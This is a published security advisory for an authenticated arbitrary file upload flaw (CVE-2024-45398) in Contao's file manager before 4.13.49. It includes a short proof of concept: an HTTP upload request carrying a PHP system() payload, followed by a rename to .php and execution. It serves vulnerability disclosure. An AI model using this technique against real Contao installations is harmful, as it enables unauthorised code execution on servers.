usd-2024-0013 | Arbitrary File Upload in Contao 4.13
Advisory ID: usd-2024-0013
Product: Contao
Affected Version: < 4.13.49
Vulnerability Type: Unrestricted Upload of File with Dangerous Type (CWE 434)
Security Risk: High CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
Vendor URL: https://contao.org/
Vendor Acknowledged Vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2024-45398
CVE Link: CVE-2024-45398
Affected Component(s) (optional)
Contao File Manager
Desciption
Authenticated users in the backend with access to the file manager can bypass the upload filter to upload arbitrary files and execute them on the server.
Proof of Concept
First, a php file is uploaded with a filename without a dot starting with any letting and ending with an allowed file ending:
POST /contao?act=move&do=files&mode=2&pid=files%2F[...] HTTP/2
Host: localhost
[...]
-----------------------------1270547763761186843258108517
Content-Disposition: form-data; name="files"; filename="ahtml"
Content-Type: text/html<?php system("date");?>
-----------------------------1270547763761186843258108517--
Then the file is renamed to a php file via the file manager GUI and executed by clicking on the file icon in the file manager.
Fix
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
References
https://cwe.mitre.org/data/definitions/434.html
https://github.com/contao/contao/security/advisories/GHSA-vm6r-j788-hjh5
Timeline
- 2024-08-15: Vulnerability identified by Jakob Steeg.
- 2024-09-02: Sent first contact request.
- 2024-09-05: Contao reports that a fix is being worked on.
- 2024-09-07: Contao published fix in version 4.13.49.
- 2024-10-30: This advisory is published.
Credits
This security vulnerability was identified by Jakob Steeg of usd AG.